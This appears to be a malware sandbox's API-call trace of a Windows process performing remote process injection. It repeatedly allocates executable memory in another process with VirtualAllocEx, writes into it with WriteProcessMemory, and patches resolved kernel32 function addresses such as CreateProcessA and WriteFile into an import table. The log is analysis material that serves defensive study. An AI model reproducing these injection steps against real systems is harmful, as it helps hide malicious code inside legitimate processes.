	[0187.838] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551ec, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.838] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.838] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.838] lstrlenA (lpString="ProcessIdToSessionId") returned 20
	[0187.838] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.838] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb73c2*, nSize=0x15, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb73c2*, lpNumberOfBytesWritten=0x12857c*=0x15) returned 1
	[0187.839] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.839] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.839] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.839] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.839] ResetEvent (hEvent=0x478) returned 1
	[0187.839] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.840] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.840] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.840] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.840] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.840] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551f0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.841] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.841] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.841] lstrlenA (lpString="GlobalAlloc") returned 11
	[0187.841] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.841] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb73da*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb73da*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.841] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.841] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.841] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.841] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.842] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.842] ResetEvent (hEvent=0x478) returned 1
	[0187.842] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.842] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.842] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.842] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.842] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.843] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551f4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.843] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.843] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.843] lstrlenA (lpString="Process32Next") returned 13
	[0187.843] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.843] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb73e8*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb73e8*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0187.844] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.844] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.844] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.844] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.844] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.845] ResetEvent (hEvent=0x478) returned 1
	[0187.845] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.845] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.845] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.845] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.845] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.845] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551f8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.846] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.846] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.846] lstrlenA (lpString="GlobalFree") returned 10
	[0187.846] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.846] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb73f8*, nSize=0xb, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb73f8*, lpNumberOfBytesWritten=0x12857c*=0xb) returned 1
	[0187.846] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.847] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.847] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.847] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.847] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.847] ResetEvent (hEvent=0x478) returned 1
	[0187.847] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.847] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.847] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.848] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.848] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.848] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551fc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.848] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.848] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.848] lstrlenA (lpString="WTSGetActiveConsoleSessionId") returned 28
	[0187.848] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1d, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.848] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7406*, nSize=0x1d, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7406*, lpNumberOfBytesWritten=0x12857c*=0x1d) returned 1
	[0187.849] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.849] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.849] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.849] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.849] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.849] ResetEvent (hEvent=0x478) returned 1
	[0187.849] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.850] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.850] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.850] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.850] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.850] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055200, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.850] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.850] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.850] lstrlenA (lpString="TerminateThread") returned 15
	[0187.850] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.851] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7426*, nSize=0x10, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7426*, lpNumberOfBytesWritten=0x12857c*=0x10) returned 1
	[0187.851] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.851] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.851] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.851] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.851] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.852] ResetEvent (hEvent=0x478) returned 1
	[0187.852] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.852] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.852] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.852] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.852] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.852] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055204, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.853] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.853] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.853] lstrlenA (lpString="CreateProcessA") returned 14
	[0187.853] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.853] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7438*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7438*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0187.853] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.853] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.853] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.853] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.854] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.854] ResetEvent (hEvent=0x478) returned 1
	[0187.854] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.854] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.854] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.854] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.854] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.854] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055208, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.855] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.855] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.855] lstrlenA (lpString="IsWow64Process") returned 14
	[0187.855] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.855] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb744a*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb744a*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0187.855] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.856] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.856] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.856] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.856] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.856] ResetEvent (hEvent=0x478) returned 1
	[0187.856] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.857] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.857] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.857] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.857] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.857] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005520c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.857] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.858] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.858] lstrlenA (lpString="WriteFile") returned 9
	[0187.858] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.858] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb745c*, nSize=0xa, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb745c*, lpNumberOfBytesWritten=0x12857c*=0xa) returned 1
	[0187.858] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.858] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.858] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.858] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.858] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.859] ResetEvent (hEvent=0x478) returned 1
	[0187.859] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.859] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.859] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.859] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.859] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.859] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055210, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.860] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.860] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.860] lstrlenA (lpString="SetFilePointer") returned 14
	[0187.860] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.860] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7468*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7468*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0187.861] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.861] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.861] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.861] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.862] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.862] ResetEvent (hEvent=0x478) returned 1
	[0187.862] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.862] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.862] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.863] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.863] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.863] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055214, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.863] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.864] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.864] lstrlenA (lpString="SetEndOfFile") returned 12
	[0187.864] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.864] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb747a*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb747a*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.864] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.864] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.864] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
